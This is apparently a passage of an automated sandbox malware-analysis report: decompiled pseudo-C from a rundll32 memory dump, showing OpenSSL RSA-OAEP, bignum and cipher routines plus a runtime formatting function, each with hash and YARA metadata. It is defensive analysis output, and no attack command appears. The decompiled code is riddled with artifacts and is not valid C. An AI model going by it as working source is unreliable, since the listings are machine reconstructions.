                                        				E0000021E21EF310DC90(2 + _t210 * 2, 0, 0, _t162,  &(_t296[ *((intOrPtr*)(_t267 + 0x150)) - r9d]), __r8, _t253, _t255, r9d);
                                        				_t260 =  &(_t296[1]);
                                        				r9d = r14d;
                                        				_t298 =  &(( &(_t296[1]))[_t210]);
                                        				_t20 = _t195 - 1; // -1
                                        				 *((long long*)(_t267 + 0x20)) =  *((intOrPtr*)(_t267 + 0x40));
                                        				 *(_t267 + 0x3c) =  ~(_t20 >> 0x0000001f &  !( *_t296 & 0x000000ff) >> 0x0000001f);
                                        				if (E0000021E21EF307E900( ~(_t20 >> 0x0000001f &  !( *_t296 & 0x000000ff) >> 0x0000001f), __ebx,  *((intOrPtr*)(_t267 + 0x40)), _t267 + 0x60, _t260, _t298, _t284, _t308) != 0) goto 0xf307f379;
                                        				if (_t113 <= 0) goto 0xf307f12b;
                                        				if (_t113 - 0x20 < 0) goto 0xf307f12b;
                                        				_t219 = _t210 - 1;
                                        				if (_t267 + 0x60 - _t219 + _t260 > 0) goto 0xf307f0c0;
                                        				_t175 = _t267 + 0x60 + _t219 - _t260;
                                        				if (_t175 >= 0) goto 0xf307f12b;
                                        				if (_t175 >= 0) goto 0xf307f0d1;
                                        				asm("o16 nop [eax+eax]");
                                        				asm("movdqu xmm0, [eax]");
                                        				asm("repe inc edx");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [eax], xmm1");
                                        				asm("repe inc edx");
                                        				asm("movdqu xmm0, [eax+0x10]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [eax+0x10], xmm1");
                                        				if (_t255 + 0x20 - _t113 - ((_t113 & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 < 0) goto 0xf307f0f0;
                                        				if (0x20 - _t210 >= 0) goto 0xf307f156;
                                        				 *(_t267 + 0x80) =  *(_t267 + 0x80) ^  *(_t267 + 0x80 + _t260 - _t267 + 0x60) & 0x000000ff;
                                        				if (0x21 - _t210 < 0) goto 0xf307f140;
                                        				r9d = _t113;
                                        				 *((long long*)(_t267 + 0x20)) =  *((intOrPtr*)(_t267 + 0x40));
                                        				if (E0000021E21EF307E900(((_t113 & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1, r14d,  *((intOrPtr*)(_t267 + 0x40)), _t253, _t260 - _t267 + 0x60, _t267 + 0x60, _t113 - ((_t113 & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1, _t308) != 0) goto 0xf307f379;
                                        				if (r14d <= 0) goto 0xf307f20a;
                                        				if (r14d - 0x20 < 0) goto 0xf307f20a;
                                        				_t226 = _t304 - 1;
                                        				if (_t253 - _t226 + _t298 > 0) goto 0xf307f1a9;
                                        				_t183 = _t226 + _t253 - _t298;
                                        				if (_t183 >= 0) goto 0xf307f20a;
                                        				if (_t183 >= 0) goto 0xf307f1bb;
                                        				asm("movdqu xmm0, [ecx]");
                                        				asm("repe inc ecx");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [ecx-0x20], xmm1");
                                        				asm("repe inc ecx");
                                        				asm("movdqu xmm0, [ecx-0x10]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [ecx-0x10], xmm1");
                                        				if ( ~_t253 + _t253 + 0x20 - r14d - ((r14d & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 < 0) goto 0xf307f1d2;
                                        				_t262 = r14d;
                                        				_t185 = 0x20 - _t262;
                                        				if (_t185 >= 0) goto 0xf307f241;
                                        				asm("o16 nop [eax+eax]");
                                        				 *(0x20 + _t253) =  *(0x20 + _t253) ^  *(0x20 + _t253 + _t298 - _t253) & 0x000000ff;
                                        				if (_t185 != 0) goto 0xf307f230;
                                        				_t206 =  *(_t267 + 0x48);
                                        				r9d = 0;
                                        				 *((long long*)(_t267 + 0x28)) = _t255;
                                        				 *((long long*)(_t267 + 0x20)) = _t206;
                                        				if (E0000021E21EF304E090(_t185, _t206, _t210,  *((intOrPtr*)(_t267 + 0x50)),  *((intOrPtr*)(_t267 + 0x160)), _t253, _t262, _t267 + 0xa0,  ~_t253) == 0) goto 0xf307f379;
                                        				_t282 = _t210;
                                        				_t247 = _t267 + 0xa0;
                                        				_t92 = E0000021E21EF302A090(_t253, _t247, _t282, _t308);
                                        				r11d =  *(_t267 + 0x3c);
                                        				r9d = 0;
                                        				_t53 = _t206 - 1; // -1
                                        				r11d = r11d &  ~(_t53 >> 0x0000001f &  !_t92 >> 0x0000001f);
                                        				_t187 = _t210 - _t262;
                                        				if (_t187 >= 0) goto 0xf307f302;
                                        				r8d =  *(_t253 + _t210) & 0x000000ff;
                                        				r9d = r9d |  ~(_t206 - 0x00000001 >> 0x0000001f &  !(r8d ^ 0x00000001) >> 0x0000001f);
                                        				r8d =  !r8d;
                                        				r8d = r8d >> 0x1f;
                                        				r11d = r11d & ( ~(_t282 - 0x00000001 >> 0x0000001f & r8d) | r9d);
                                        				if (_t187 != 0) goto 0xf307f2b0;
                                        				if ((r11d & r9d) == 0) goto 0xf307f339;
                                        				_t60 = _t255 + 1; // 0x1
                                        				r15d = r14d;
                                        				r15d = r15d - _t60;
                                        				if ( *((intOrPtr*)(_t267 + 0x38)) - r15d >= 0) goto 0xf307f366;
                                        				 *((intOrPtr*)(_t267 + 0x20)) = 0xe3;
                                        				_t63 = _t247 - 0x2c; // 0x6d
                                        				r8d = _t63;
                                        				E0000021E21EF30222D0(4, 0x99,  *((intOrPtr*)(_t267 + 0x38)) - r15d, _t206, _t210, _t253, _t247, _t255, _t262 - _t210 - 1, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c");
                                        				 *((intOrPtr*)(_t267 + 0x20)) = 0xf0;
                                        				_t66 = _t247 - 0x20; // 0x79
                                        				r8d = _t66;
                                        				_t108 = E0000021E21EF30222D0(4, 0x99,  *((intOrPtr*)(_t267 + 0x38)) - r15d, _t206, _t210, _t253, _t247, _t255, _t262 - _t210 - 1, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c");
                                        				r15d = r15d | 0xffffffff;
                                        				goto 0xf307f37e;
                                        				E0000021E21EF310DC90(4, 0, 0 &  !( !r9d &  ~(_t206 - 0x00000001 >> 0x0000001f &  !(r8d ^ 0x00000001) >> 0x0000001f)) |  !r9d &  ~(_t206 - 0x00000001 >> 0x0000001f &  !(r8d ^ 0x00000001) >> 0x0000001f) & _t113, _t162,  *((intOrPtr*)(_t267 + 0x58)), _t108 + _t253, _t253, _t255, r15d);
                                        				r8d = 0xf2;
                                        				E0000021E21EF3025750();
                                        				r8d = 0xf3;
                                        				_t251 = "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c";
                                        				E0000021E21EF3025750();
                                        				goto 0xf307f3d4;
                                        				 *((intOrPtr*)(_t267 + 0x20)) = 0xa0;
                                        				_t70 = _t251 - 0x58; // 0x41
                                        				r8d = _t70;
                                        				_t111 = E0000021E21EF30222D0(4, 0x99,  *((intOrPtr*)(_t267 + 0x38)) - r15d, _t206, _t210,  *(_t267 + 0x30), "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c", _t255, _t262 - _t210 - 1, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c");
                                        				goto 0xf307f379;
                                        				E0000021E21EF310C290();
                                        				return _t111 | 0xffffffff;
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\rsa\rsa_oaep.c
                                        • API String ID: 0-4203199248
                                        • Opcode ID: 19c273a6a853ded302c4e052d480de22dbbc3b184694ff403f6fa53c1001389a
                                        • Instruction ID: 8446b9d2e3a7d4b2a9d8a29e87b4e97409144ac2edd78c02b4a0aa6dc88ffb88
                                        • Opcode Fuzzy Hash: 19c273a6a853ded302c4e052d480de22dbbc3b184694ff403f6fa53c1001389a
                                        • Instruction Fuzzy Hash: 60D11872315A8585EF20DF29E8483EB67A1F7A9784F814226EE4A47F96DF3CC146C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E0000021E21EF307D310(void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				intOrPtr _v16;
                                        				void* __rbx;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				void* _t34;
                                        
                                        				_t24 = __rdx;
                                        				_t20 = __rax;
                                        				_a32 = __r9;
                                        				_a24 = __r8;
                                        				_a16 = __rdx;
                                        				_a8 = __rcx;
                                        				E0000021E21EF310C220();
                                        				r12d = 0;
                                        				_t5 = _t20 - 0x54; // -84
                                        				r13d = r12d;
                                        				if (E0000021E21EF3043BA0(_t5, __r8) == 0) goto 0xf307d38a;
                                        				_t6 = _t34 + 0x75; // 0x75
                                        				_v16 = 0x466;
                                        				_t8 = _t24 - 0x72; // 0x3
                                        				_t9 = _t34 + 0x42; // 0x42
                                        				r8d = _t9;
                                        				E0000021E21EF30222D0(_t8, _t6, E0000021E21EF3043BA0(_t5, __r8), __rax, __rdx, __r8, __rdx, __r8, __r9, "..\\..\\openssl-1.1.0f\\crypto\\bn\\bn_exp.c");
                                        				return 0;
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\bn\bn_exp.c
                                        • API String ID: 0-1773629128
                                        • Opcode ID: 44cf608c8e9e0ea1f27ad89a929adb69eb242ecc0d45be217823984423d52145
                                        • Instruction ID: 5885d0a645bc0daa010d7a183fe39a26361e9006bc1e86a4e08874b9fbb0126e
                                        • Opcode Fuzzy Hash: 44cf608c8e9e0ea1f27ad89a929adb69eb242ecc0d45be217823984423d52145
                                        • Instruction Fuzzy Hash: B0A1EB7230028541FE60FA62AE097EBA2956BE0BC4F4681235E4C57F86EF3CC543D720
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 0c588d3321d01fc6d3c2f21d91274fff83078ffc8083afe41d4df569c79e9f7f
                                        • Instruction ID: 082a103f266b4c04ef7ec0eca11c3af12a362ecdfb27a8ce1239e85d6a8b2415
                                        • Opcode Fuzzy Hash: 0c588d3321d01fc6d3c2f21d91274fff83078ffc8083afe41d4df569c79e9f7f
                                        • Instruction Fuzzy Hash: F8711472215BC085EF148F25E8443AB6BA0F399B9CF159626DF9E03B99DA3CC592D304
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E0000021E21EF3114F38(void* __rax, long long __rbx, long long __rcx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
                                        				long long _v40;
                                        				void* __rdi;
                                        				char _t66;
                                        				void* _t68;
                                        				void* _t104;
                                        				unsigned int _t105;
                                        				intOrPtr _t106;
                                        				unsigned int _t107;
                                        				signed char _t114;
                                        				void* _t119;
                                        				void* _t123;
                                        				void* _t124;
                                        				void* _t125;
                                        				void* _t162;
                                        				void* _t174;
                                        				void* _t176;
                                        				intOrPtr* _t182;
                                        				void* _t184;
                                        				void* _t185;
                                        				void* _t187;
                                        				void* _t192;
                                        				void* _t194;
                                        
                                        				_t179 = __rsi;
                                        				_t162 = __rax;
                                        				_a16 = __rbx;
                                        				_a24 = __rbp;
                                        				_a32 = __rsi;
                                        				_t185 = _t184 - 0x30;
                                        				_t66 =  *((char*)(__rcx + 0x41));
                                        				r15d = 1;
                                        				_t125 = _t66 - 0x64;
                                        				if (_t125 > 0) goto 0xf3114fbf;
                                        				if (_t125 == 0) goto 0xf3115030;
                                        				if (_t66 == 0x41) goto 0xf3115043;
                                        				if (_t66 == 0x43) goto 0xf3114fa9;
                                        				if (_t66 - 0x44 <= 0) goto 0xf311504c;
                                        				if (_t66 - 0x47 <= 0) goto 0xf3115043;
                                        				if (_t66 == 0x53) goto 0xf3114fec;
                                        				if (_t66 == 0x58) goto 0xf3115001;
                                        				if (_t66 == 0x5a) goto 0xf3114fb5;
                                        				if (_t66 == 0x61) goto 0xf3115043;
                                        				if (_t66 != 0x63) goto 0xf311504c;
                                        				E0000021E21EF3115CAC(_t66 - 0x63, __rcx, __rcx);
                                        				goto 0xf3115048;
                                        				_t68 = E0000021E21EF311574C(__rcx, __rcx, __rsi);
                                        				goto 0xf3115048;
                                        				if (_t68 - 0x67 <= 0) goto 0xf3115043;
                                        				if (_t68 == 0x69) goto 0xf3115030;
                                        				if (_t68 == 0x6e) goto 0xf3115029;
                                        				if (_t68 == 0x6f) goto 0xf311500b;
                                        				if (_t68 == 0x70) goto 0xf3114ff3;
                                        				if (_t68 == 0x73) goto 0xf3114fec;
                                        				if (_t68 == 0x75) goto 0xf3115034;
                                        				if (_t68 != 0x78) goto 0xf311504c;
                                        				goto 0xf3115039;
                                        				E0000021E21EF3116084(__rcx, __rcx, _t179);
                                        				goto 0xf3115048;
                                        				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
                                        				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
                                        				r8b = r15b;
                                        				goto 0xf311503c;
                                        				_t105 =  *(__rcx + 0x30);
                                        				if ((r15b & _t105 >> 0x00000005) == 0) goto 0xf311501f;
                                        				asm("bts ecx, 0x7");
                                        				 *(__rcx + 0x30) = _t105;
                                        				goto 0xf3115039;
                                        				E0000021E21EF3115FA8(_t105 >> 5, 8, __rcx, __rcx, _t174, _t179);
                                        				goto 0xf3115048;
                                        				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
                                        				r8d = 0;
                                        				E0000021E21EF3115E08(_t104, 0xa, __rcx, _t187, _t192);
                                        				goto 0xf3115048;
                                        				if (E0000021E21EF311584C(_t119, _t162, __rcx, __rcx, _t179, __rbp, _t187) != 0) goto 0xf3115053;
                                        				goto 0xf3115198;
                                        				if ( *((char*)(__rcx + 0x40)) != 0) goto 0xf3115195;
                                        				_t114 =  *(__rcx + 0x30);
                                        				_a8 = 0;
                                        				_a10 = 0;
                                        				if ((r15b & 0) == 0) goto 0xf31150a5;
                                        				if ((r15b & 0) == 0) goto 0xf3115088;
                                        				_a8 = 0x2d;
                                        				goto 0xf31150a2;
                                        				if ((r15b & _t114) == 0) goto 0xf3115094;
                                        				_a8 = 0x2b;
                                        				goto 0xf31150a2;
                                        				if ((r15b & 0) == 0) goto 0xf31150a5;
                                        				_a8 = 0x20;
                                        				_t176 = _t194;
                                        				_t106 =  *((intOrPtr*)(__rcx + 0x41));
                                        				if (0 != 0) goto 0xf31150be;
                                        				if ((r15b & 0) == 0) goto 0xf31150be;
                                        				r8b = r15b;
                                        				goto 0xf31150c1;
                                        				r8b = 0;
                                        				if (r8b != 0) goto 0xf31150d2;
                                        				if (0 == 0) goto 0xf31150fc;
                                        				 *((char*)(_t185 + _t176 + 0x50)) = 0x30;
                                        				if (_t106 == 0x58) goto 0xf31150e8;
                                        				if (_t106 == 0x41) goto 0xf31150e8;
                                        				goto 0xf31150eb;
                                        				asm("sbb al, al");
                                        				 *((char*)(_t185 + _t176 + _t194 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
                                        				_t123 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
                                        				if ((_t114 & 0x0000000c) != 0) goto 0xf311511e;
                                        				r8d = _t123;
                                        				E0000021E21EF31133C0(( ~r15b & 0x000000e0) + 0x78, 0x20, __rcx, __rcx + 0x468, __rcx + 0x28);
                                        				_t182 = __rcx + 0x28;
                                        				_v40 =  *((intOrPtr*)(__rcx + 0x10));
                                        				r8d = 0;
                                        				E0000021E21EF31167F8(_t123, _t124, __rcx, __rcx + 0x468, _t176 + _t194 + _t194, _t179, _t182, _t182);
                                        				_t107 =  *(__rcx + 0x30);
                                        				if ((r15b & _t107 >> 0x00000003) == 0) goto 0xf311516a;
                                        				if ((r15b & _t107 >> 0x00000002) != 0) goto 0xf311516a;
                                        				r8d = _t123;
                                        				E0000021E21EF31133C0(_t107 >> 3, 0x30, __rcx, __rcx + 0x468, _t182);
                                        				E0000021E21EF3116340(__rcx, __rcx, _t179);
                                        				if ( *_t182 < 0) goto 0xf3115195;
                                        				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0xf3115195;
                                        				r8d = _t123;
                                        				E0000021E21EF31133C0( *(__rcx + 0x30) >> 2, 0x20, __rcx, __rcx + 0x468, _t182);
                                        				return r15b;
                                        			}


























                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: 0
                                        • API String ID: 3215553584-4108050209
                                        • Opcode ID: 1e8cdb325f8c5063b2eceb296698c12dc0071de2deb1ad2c62c982258cd230f5
                                        • Instruction ID: 63e1f4ba1c058a296b8ae7f86da60987db2c088cb04265de97c9d4a40710831d
                                        • Opcode Fuzzy Hash: 1e8cdb325f8c5063b2eceb296698c12dc0071de2deb1ad2c62c982258cd230f5
                                        • Instruction Fuzzy Hash: 4271F73121428046FFA8AA69884C3EF67F9A761B44F161915DD418BFABCB2ECD47C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E0000021E21EF30528D0(long long __rbx, unsigned int __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __rbp, unsigned int __r9, signed int __r10, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				signed int _t44;
                                        				signed int _t46;
                                        				signed int _t47;
                                        				signed int _t48;
                                        				signed int _t55;
                                        				unsigned int _t62;
                                        				signed int _t65;
                                        				signed int _t78;
                                        				signed int _t89;
                                        				signed int _t94;
                                        				signed int _t99;
                                        				void* _t175;
                                        				unsigned long long _t180;
                                        				signed long long _t181;
                                        				signed long long _t185;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_a32 = __rdi;
                                        				_t175 = __rcx + 1;
                                        				r9d =  *(_t175 + 3) & 0x000000ff;
                                        				_t44 =  *__rcx & 0x000000ff | ( *(__rcx + 1) & 0x000000ff) << 0x00000008 | ( *(_t175 + 1) & 0x000000ff) << 0x00000010 | ( *(_t175 + 2) & 0x000000ff) << 0x00000018;
                                        				r9d = r9d | ( *(_t175 + 4) & 0x000000ff) << 0x00000008;
                                        				r9d = r9d | (( *(_t175 + 6) & 0x000000ff) << 0x00000008 |  *(_t175 + 5) & 0x000000ff) << 0x00000010;
                                        				_t78 = (r9d >> 0x00000004 ^ _t44) & 0x0f0f0f0f;
                                        				_t45 = _t44 ^ _t78;
                                        				r9d = r9d ^ _t78 << 0x00000004;
                                        				_t46 = _t44 ^ _t78 ^ ((_t45 << 0x00000012 ^ _t45) & 0xcccc0000) >> 0x00000012 ^ (_t45 << 0x00000012 ^ _t45) & 0xcccc0000;
                                        				r9d = r9d ^ ((r9d << 0x00000012 ^ r9d) & 0xcccc0000) >> 0x00000012 ^ (r9d << 0x00000012 ^ r9d) & 0xcccc0000;
                                        				_t89 = (r9d >> 0x00000001 ^ _t46) & 0x55555555;
                                        				_t47 = _t46 ^ _t89;
                                        				r9d = r9d ^ _t89 + _t89;
                                        				_t94 = (_t47 >> 0x00000008 ^ r9d) & 0x00ff00ff;
                                        				r9d = r9d ^ _t94;
                                        				_t48 = _t47 ^ _t94 << 0x00000008;
                                        				_t99 = (r9d >> 0x00000001 ^ _t48) & 0x55555555;
                                        				r9d = r9d ^ _t99 + _t99;
                                        				r9d = r9d & 0x0000ff00;
                                        				_t62 = (r9d >> 0x0000000c & 0x00000ff0 | (_t48 ^ _t99) & 0xf000000f) >> 0x00000004 | (r9b & 0xffffffff) << 0x00000010 | r9d;
                                        				if ( *0xf316ca40 == 0) goto 0xf3052a1f;
                                        				goto 0xf3052a31;
                                        				_t55 = (_t62 << 0x0000001a << 0x0000001b | _t62 >> 0x00000002 >> 0x00000001) & 0x0fffffff;
                                        				r10d = _t55;
                                        				_t65 = (_t62 << 0x0000001b | _t62 >> 0x00000001) & 0x0fffffff;
                                        				r9d = _t55;
                                        				_t185 = __r9 >> 1;
                                        				r10d = r10d & 0x0000003f;
                                        				r8d = r8d & 0x07000000;
                                        				r9d = r9d & 0x00060000;
                                        				_t180 = ((_t185 | __rcx) >> 0x00000001 | __rcx) >> 0x14;
                                        				r11d =  *(0xf316c240 + 0x300 + _t180 * 4);
                                        				r11d = r11d |  *(0xf316c240 + 0x100 + ((_t185 | __rcx) >> 6) * 4);
                                        				r8d = _t65;
                                        				_t181 = _t180 >> 1;
                                        				r11d = r11d |  *(0xf316c240 + 0x200 + ((_t185 | __rcx) >> 0xd) * 4);
                                        				r11d = r11d |  *(0xf316c240 + __r10 * 4);
                                        				r10d = _t65;
                                        				r8d = r8d & 0x00001e00;
                                        				r10d = r10d & 0x0000003f;
                                        				r9d =  *(0xf316c240 + 0x700 + ((_t181 | __rcx) >> 0x15) * 4);
                                        				r11d = r11d >> 0x10;
                                        				r9d = r9d |  *(0xf316c240 + 0x500 + ((_t181 | __rcx) >> 7) * 4);
                                        				r9d = r9d |  *(0xf316c240 + 0x600 + (__rcx >> 0xf) * 4);
                                        				r9d = r9d |  *(0xf316c240 + 0x400 + __r10 * 4);
                                        				r9d = r9d & 0xffff0000;
                                        				r11d = r11d | r9d;
                                        				asm("inc ecx");
                                        				asm("ror edx, 0x1e");
                                        				 *__rdx = r11w & 0xffffffff | r9d << 0x00000010;
                                        				__rdx[1] = r11d;
                                        				if (0x21ef316ca44 - "..\\..\\openssl-1.1.0f\\crypto\\evp\\evp_enc.c" < 0) goto 0xf3052a00;
                                        				return _t55;
                                        			}



















                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\evp\evp_enc.c
                                        • API String ID: 0-3265282262
                                        • Opcode ID: 6115c68850099d0d5c228b3fa95897ba6e4563580928cf819ccc0873f49add84
                                        • Instruction ID: f574565a0ac4d39616d6db62804fec6af2a7bd370d939907adf03f2a1846f36c
                                        • Opcode Fuzzy Hash: 6115c68850099d0d5c228b3fa95897ba6e4563580928cf819ccc0873f49add84
                                        • Instruction Fuzzy Hash: C351F87371495107E76C8A69AC66BBE6A92D3C4388F44923DEF5797FCAC92CC612C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A7C2(void* __eax, void* __ebx, void* __edi, signed int __ebp, void* __eflags, long long __rax, void* __rbx, intOrPtr* __rcx, void* __rdi, void* __rsi, void* __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
                                        				signed char _t58;
                                        				signed char _t59;
                                        				void* _t65;
                                        				signed char _t70;
                                        				intOrPtr _t82;
                                        				void* _t84;
                                        				long long _t120;
                                        				void* _t121;
                                        				void* _t165;
                                        
                                        				_t165 = __r9;
                                        				_t121 = __rbx;
                                        				_t120 = __rax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
                                        				_t58 = __eax - 0xc88b83;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t58;
                                        				_t59 = _t58 & 0x0000003d;
                                        				 *__rcx =  *__rcx - _t59;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t59;
                                        				if (__eflags == 0) goto 0xf304a7ed;
                                        				if (_t59 != 0x38e) goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
                                        				_a80 = _a80 + 1;
                                        				if (_a80 - E0000021E21EF30290D0(_t59, __rdi) < 0) goto 0xf304a761;
                                        				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(__rax, _t121);
                                        				if (__rax == 0) goto 0xf304a85d;
                                        				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
                                        				 *(_t121 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
                                        				goto 0xf304a84e;
                                        				 *(_t121 + 0xcc) = __ebp;
                                        				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000008;
                                        				E0000021E21EF30749F0(__rax);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t120, _t121);
                                        				r9d = 0;
                                        				 *((long long*)(_t121 + 0xd0)) = _t120;
                                        				r8d = 0;
                                        				_t65 = E0000021E21EF3091730(_t120, _t121);
                                        				 *((long long*)(_t121 + 0xd8)) = _t120;
                                        				E0000021E21EF30480C0(E0000021E21EF3035740(_t65, _t121), _t121);
                                        				if (E0000021E21EF3047B30(_t120, _t121, _t120, _t120) != 0) goto 0xf304a8e8;
                                        				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000020;
                                        				if (E0000021E21EF3049EB0(_t120, _t121,  *((intOrPtr*)(_t121 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
                                        				_t70 =  *(_t121 + 0xc0);
                                        				if ((_t70 & 0x00000002) == 0) goto 0xf304a8de;
                                        				if (( *(_t121 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
                                        				asm("bts eax, 0xd");
                                        				 *(_t121 + 0xc0) = _t70;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t120, _t121);
                                        				r9d = 0;
                                        				 *((long long*)(_t121 + 0xf0)) = _t120;
                                        				E0000021E21EF3091730(_t120, _t121);
                                        				 *((long long*)(_t121 + 0xf8)) = _t120;
                                        				if (_t120 != 0) goto 0xf304a933;
                                        				if (_a80 == 0xffffffff) goto 0xf304a933;
                                        				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000080;
                                        				E0000021E21EF304A430(_a80 - 0xffffffff, _t120, _t121, _t121, _t120);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t120, _t121);
                                        				r9d = 0;
                                        				 *((long long*)(_t121 + 0x100)) = _t120;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t120, _t121);
                                        				 *((long long*)(_t121 + 0x108)) = _t120;
                                        				_a80 = __ebp;
                                        				if (_a80 - E0000021E21EF3091710(_t120, _t121) >= 0) goto 0xf304aa2e;
                                        				E0000021E21EF30916D0(_t120, _t121);
                                        				E0000021E21EF30AC080(_t120);
                                        				if (E0000021E21EF3031F80(_t120, _t120) != 0x359) goto 0xf304a9c1;
                                        				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00001000;
                                        				if (E0000021E21EF3091750(_t120) == 0) goto 0xf304aa0a;
                                        				E0000021E21EF30AC080(_t120);
                                        				_t82 = E0000021E21EF3031F80(_t120, _t120);
                                        				_a88 = _t82;
                                        				if (_t82 == 0) goto 0xf304aa24;
                                        				r9d = 4;
                                        				_a32 = 0xf309af50;
                                        				_t47 = _t165 + 0xa; // 0xa
                                        				r8d = _t47;
                                        				E0000021E21EF30319D0(_t120);
                                        				if (_t120 == 0) goto 0xf304aa24;
                                        				_a80 = _a80 + 1;
                                        				_t84 = E0000021E21EF3091710(_t120, _t121);
                                        				if (_a80 - _t84 < 0) goto 0xf304a993;
                                        				goto 0xf304aa2e;
                                        				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000200;
                                        				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000100;
                                        				return _t84;
                                        			}













                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: faee3053493eed21173e01546e8c39f72b2ac5eb792b1d4fe10e4af215a08a51
